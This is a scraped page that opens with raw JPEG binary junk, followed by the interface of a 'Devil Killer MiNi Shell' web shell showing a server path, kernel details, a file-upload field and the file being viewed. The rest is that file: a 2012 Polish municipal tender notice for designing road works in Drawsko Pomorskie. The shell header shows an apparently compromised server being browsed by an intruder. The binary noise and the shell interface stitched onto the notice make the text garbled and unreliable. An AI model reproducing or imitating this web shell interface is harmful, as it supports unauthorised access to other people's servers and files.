JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120223/55104-N-2012.html

<p class="kh_header"><b>Drawsko Pomorskie: Zadanie nr 1: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.Przebudowa dróg w kwartale ul. Wywiórskiego - Witkiewicza - Siemiradzkiego - Grottgera; Zadanie nr 2: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.Przebudowa nawierzchni ul. Spokojnej, ul. Ogrodowej i ul. Polnej; Zadanie nr 3:Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Budowa nawierzchni dróg na osiedlu domów jednorodzinnych w obrębie ulic Gdyńska-Zakopiańska</b><br>
<b>Numer ogłoszenia: 55104 - 2012; data zamieszczenia: 23.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Drawsko Pomorskie , ul. Gen. W. Sikorskiego 41, 78-500 Drawsko Pomorskie, woj. zachodniopomorskie, tel. 094 36334-85 do 7, faks 094 363-31-13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.drawsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.Przebudowa dróg w kwartale ul. Wywiórskiego - Witkiewicza - Siemiradzkiego - Grottgera; Zadanie nr 2: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.Przebudowa nawierzchni ul. Spokojnej, ul. Ogrodowej i ul. Polnej; Zadanie nr 3:Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Budowa nawierzchni dróg na osiedlu domów jednorodzinnych w obrębie ulic Gdyńska-Zakopiańska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie kompleksowych dokumentacji projektowych dla zadań: 

a)	Zadanie nr 1: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.Przebudowa dróg w kwartale ul. Wywiórskiego - Witkiewicza - Siemiradzkiego - Grottgera
b)	Zadanie nr 2: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.Przebudowa nawierzchni ul. Spokojnej, ul. Ogrodowej i ul. Polnej
c)	Zadanie nr 3:Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Budowa nawierzchni dróg na osiedlu domów jednorodzinnych w obrębie ulic Gdyńska-Zakopiańska.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości :
a)	Zadanie nr 1: Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Przebudowa dróg w kwartale ul. Wywiórskiego - Witkiewicza - Siemiradzkiego - Grottgera  4 500,00 (cztery tysiące pięćset złotych 00/100)
b)	Zadanie nr 2: Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Przebudowa nawierzchni ul. Spokojnej, ul. Ogrodowej i ul. Polnej 1 500,00 (jeden tysiąc pięćset złotych 00/100)
c)	Zadanie nr 3: Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Budowa nawierzchni dróg na osiedlu domów jednorodzinnych w obrębie ulic Gdyńska-Zakopiańska  6 000,00 (sześć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie - Wykonawca zrealizował, jako główny wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zadanie projektowe budowy lub przebudowy dróg wraz z kanalizacją o wartości nie mniejszej niż wartość przedmiotu zamówienia (wybranego zadania) wraz z załączeniem dokumentów potwierdzających ich rodzaj, wartość, datę i miejsce wykonania wraz z informacją, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia - Wykonawca dysponuje, lub będzie dysponował osobami które będą uczestniczyć w wykonaniu zamówienia, w tym co najmniej:
a)	Jedną osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej na podstawie przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz  posiadającą co najmniej roczne doświadczenie przy pracach tego rodzaju, 
b)	 Jedną osobą posiadającą  uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych na podstawie przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane oraz posiadającą co najmniej roczne doświadczenie przy pracach tego rodzaju.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa - Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności :
a)	Zadanie nr 1: Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Przebudowa dróg w kwartale ul. Wywiórskiego - Witkiewicza - Siemiradzkiego - Grottgera na kwotę co najmniej 100.000,00 zł
b)	Zadanie nr 2: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.  Przebudowa nawierzchni ul. Spokojnej, ul. Ogrodowej i ul. Polnej na kwotę co najmniej 50.000,00 zł
c)	Zadanie nr 3: Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Budowa nawierzchni dróg na osiedlu domów jednorodzinnych w obrębie ulic Gdyńska-Zakopiańska  na kwotę co najmniej 100.000,00 zł 

W przypadku składania ofert na pojedyncze zadania wymagane  jest, aby Wykonawca ubezpieczony był na kwoty wymienione powyżej odpowiednio dla zadań na które składa ofertę. Kwoty sumują się w przypadku składania ofert przez Wykonawcę na większą ilość zadań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany obowiązującej stawki podatku od towarów i usług (VAT) Zamawiający zgodnie z art. 144 ustawy przewiduje możliwość dokonania zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, polegającej na ustaleniu wysokości wynagrodzenia brutto z uwzględnieniem wysokości obowiązującej po zmianie stawki podatku od towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.drawsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Drawsku Pomorskim, ul. Gen. W. Sikorskiego 41 78-500 Drawsko Pomorskie pok. nr 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 12:00, miejsce: miejsce: Urząd Miejski ul. gen. W. Sikorskiego 41 78-500 Drawsko Pomorskie, pok. nr 210 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.Przebudowa dróg w kwartale ul. Wywiórskiego - Witkiewicza - Siemiradzkiego - Grottgera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1: Opracowanie kompletnej dokumentacji projektowej dla zadania pn. Przebudowa dróg w kwartale ul. Wywiórskiego - Witkiewicza - Siemiradzkiego - Grottgera. W ramach tego zadania planowane jest wykonanie projektów następujących ulic (zgodnie z załącznikiem mapowym):
1.	ul. Witkiewicza
2.	ul. Stanisławskiego
3.	ul. Michałowskiego
4.	ul. Gierymskiego
5.	pozostałe drogi wewnętrzne i miejsca postojowe w kwartale ulic Wywiórskiego-Witkiewicza-Siemiradzkiego-Grottgera.
Zadanie nr 1 powinno obejmować:
1.	Wykonanie projektu budowlanego i wykonawczego budowy kanalizacji deszczowej i przebudowy dróg  w kwartale ul. Wywiórskiego-Witkiewicza-Siemiradzkiego-Grottgera wraz z kompletem dokumentów i uzgodnień niezbędnych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej wymaganych przez Ustawę z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
2.	Wykonanie projektów budowlanych i wykonawczych na ewentualne przebudowy istniejących sieci infrastruktury technicznej, kolidujących z sieciami i obiektami projektowanymi wraz z kompletem dokumentów i uzgodnień niezbędnych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej. Projekty obejmujące usunięcie kolizji powinny być uzgodnione z właścicielami urządzeń.
3.	Wykonanie projektu organizacji ruchu drogowego na czas prowadzenia robót i uzyskanie niezbędnych uzgodnień.
4.	Wykonanie projektu docelowej organizacji ruchu na przebudowywanych drogach i uzyskanie niezbędnych uzgodnień.
5.	Wykonanie map sytuacyjno-wysokościowych do celów projektowych koniecznych do wykonania przedmiotu zamówienia w wersji papierowej i elektronicznej
6.	Przygotowanie wniosku i uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach. W przypadku, gdy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie decyzji o środowiskowych uwarunkowaniach, należy dołączyć do dokumentacji opinię organu właściwego do wydania przedmiotowej decyzji potwierdzającą brak konieczności jej uzyskania.
7.	Uzyskanie pozwolenia wodnoprawnego. Wykonanie operatu wodnoprawnego uzależnione jest od sposobu projektowania odwodnienia drogi. W przypadku, kiedy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie pozwolenia wodnoprawnego, należy dołączyć do dokumentacji opinię organu właściwego do wydania decyzji-pozwolenie wodnoprawne, potwierdzającą brak konieczności jej uzyskania.
8.	Wykonanie niezbędnych badań geotechnicznych gruntu i opracowanie dokumentacji geotechnicznej, sprawdzenie konstrukcji drogi i zbadanie jej nośności.
9.	Wykonanie inwentaryzacji zadrzewienia kolidującego z rozwiązaniami projektowymi. Sporządzenie inwentaryzacji zadrzewienia kolidującego z rozwiązaniami projektowanymi oraz plan wyrębu.
10.	Wykonanie kosztorysów inwestorskich i przedmiarów na zaprojektowane roboty - układ szczegółowy i uproszczony. Kosztorysy należy wykonać dla każdej z ulic oddzielnie i oddzielnie dla każdej z branż w programie kosztorysowym NORMA lub innym kompatybilnym, przekazane winny być w formie papierowej a także na nośniku elektronicznym- wgranym w formacie *ath i *pdf
11.	Wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych oraz Informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
12.	Uzyskanie pozostałych opinii, pozwoleń, postanowień i decyzji wymaganych przez Ustawę z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
13.  Złożenie wniosku w imieniu Zamawiającego i uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej na podst. Ustawy z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.  Przebudowa nawierzchni ul. Spokojnej, ul. Ogrodowej i ul. Polnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.  Przebudowa nawierzchni ul. Spokojnej, ul. Ogrodowej i ul. Polnej. W ramach tego zadania planowane jest wykonanie projektów następujących ulic(zgodnie z załącznikiem mapowym):
1.	ul. Spokojna (część ulicy)
2.	ul. Ogrodowa
3.	ul. Polna
Zadanie nr 2 powinno obejmować:

1.	Wykonanie projektu budowlanego i wykonawczego przebudowy ulicy Polnej, Ogrodowej i części ulicy Spokojnej wraz z chodnikami i wjazdami oraz odprowadzeniem wody deszczowej wraz z kompletem dokumentów i uzgodnień niezbędnych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej wymaganych przez Ustawę z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
2.	Wykonanie projektów budowlanych i wykonawczych na ewentualne przebudowy istniejących sieci infrastruktury technicznej, kolidujących z sieciami i obiektami projektowanymi wraz z kompletem dokumentów i uzgodnień niezbędnych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej. Projekty obejmujące usunięcie kolizji powinny być uzgodnione z właścicielami urządzeń.
3.	Wykonanie projektu organizacji ruchu drogowego na czas prowadzenia robót i uzyskanie niezbędnych uzgodnień.
4.	Wykonanie projektu docelowej organizacji ruchu na przebudowywanych drogach i uzyskanie niezbędnych uzgodnień.
5.	Wykonanie map sytuacyjno-wysokościowych do celów projektowych koniecznych do wykonania przedmiotu zamówienia w wersji papierowej i elektronicznej
6.	Przygotowanie wniosku i uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach. W przypadku, gdy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie decyzji o środowiskowych uwarunkowaniach, należy dołączyć do dokumentacji opinię organu właściwego do wydania przedmiotowej decyzji potwierdzającą brak konieczności jej uzyskania.
7.	Uzyskanie pozwolenia wodnoprawnego. Wykonanie operatu wodnoprawnego uzależnione jest od sposobu projektowania odwodnienia drogi. W przypadku, kiedy projektant uzna, że dla realizowanego przedsięwzięcia nie jest wymagane, zgodnie z obowiązującymi przepisami, uzyskanie pozwolenia wodnoprawnego, należy dołączyć do dokumentacji opinię organu właściwego do wydania decyzji-pozwolenie wodnoprawne, potwierdzającą brak konieczności jej uzyskania.
8.	Wykonanie niezbędnych badań geotechnicznych gruntu i opracowanie dokumentacji geotechnicznej, sprawdzenie konstrukcji drogi i zbadanie jej nośności.
9.	Wykonanie inwentaryzacji zadrzewienia kolidującego z rozwiązaniami projektowymi. Sporządzenie inwentaryzacji zadrzewienia kolidującego z rozwiązaniami projektowanymi oraz plan wyrębu.
10.	Wykonanie kosztorysów inwestorskich i przedmiarów na zaprojektowane roboty - układ szczegółowy i uproszczony. Kosztorysy należy wykonać dla każdej z ulic oddzielnie i oddzielnie dla każdej z branż w programie kosztorysowym NORMA lub innym kompatybilnym, przekazane winny być w formie papierowej a także na nośniku elektronicznym- wgranym w formacie *ath i *pdf
11.	Wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych oraz Informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
12.	Uzyskanie pozostałych opinii, pozwoleń, postanowień i decyzji wymaganych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej wymaganych przez Ustawę z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
13.  Złożenie wniosku w imieniu Zamawiającego i uzyskanie  decyzji o zezwoleniu na realizację inwestycji drogowej na podst. Ustawy z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.  Budowa nawierzchni dróg na osiedlu domów jednorodzinnych w obrębie ulic Gdyńska-Zakopiańska..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3: Opracowanie kompletnej dokumentacji projektowej dla zadania pn.  Budowa nawierzchni dróg na osiedlu domów jednorodzinnych w obrębie ulic Gdyńska-Zakopiańska. W ramach tego zadania planowane jest wykonanie projektów następujących ulic(zgodnie z załącznikiem mapowym):
1.	ul. Zakopiańska (część ulicy powyżej ul. Górskiej)
2.	ul. Jeleniogórska
3.	ul. Orlicka
4.	ul. Izerska
5.	ul. Świętokrzyska
6.	ul. Karkonoska
7.	ul. Górska 
8.	pozostałe ulice- nie mające jeszcze nazwy- zgodnie z załączoną koncepcją zagospodarowania przestrzennego
Zadanie nr 3 powinno obejmować:

1.	Wykonanie projektu budowlanego i wykonawczego budowy kanalizacji deszczowej i budowy ulic wraz z chodnikami i wjazdami na osiedlu domów jednorodzinnych w obrębie ulic Zakopiańska -Gdyńska wraz z kompletem dokumentów i uzgodnień niezbędnych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej wymaganych przez Ustawę z dnia 10 kwietnia 2003 r. ( z późniejszymi zmianami) o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
2.	Wykonanie projektów budowlanych i wykonawczych na ewentualne przebudowy istniejących sieci infrastruktury technicznej, kolidujących z sieciami i obiektami projektowanymi wraz z kompletem dokumentów i uzgodnień niezbędnych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej. Projekty obejmujące usunięcie kolizji powinny być uzgodnione z właścicielami urządzeń.
3.	Wykonanie projektu organizacji ruchu drogowego na czas prowadzenia robót i uzyskanie niezbędnych uzgodnień.
4.	Wykonanie projektu docelowej organizacji ruchu na przebudowywanych drogach i uzyskanie niezbędnych uzgodnień.
5.	Wykonanie map do celów projektowych koniecznych do wykonania przedmiotu zamówienia w wersji papierowej i elektronicznej wraz z podziałem geodezyjnym działek ( nieruchomości ) - wydzieleniem działek pod drogi publiczne przez uprawnionego geodetę.
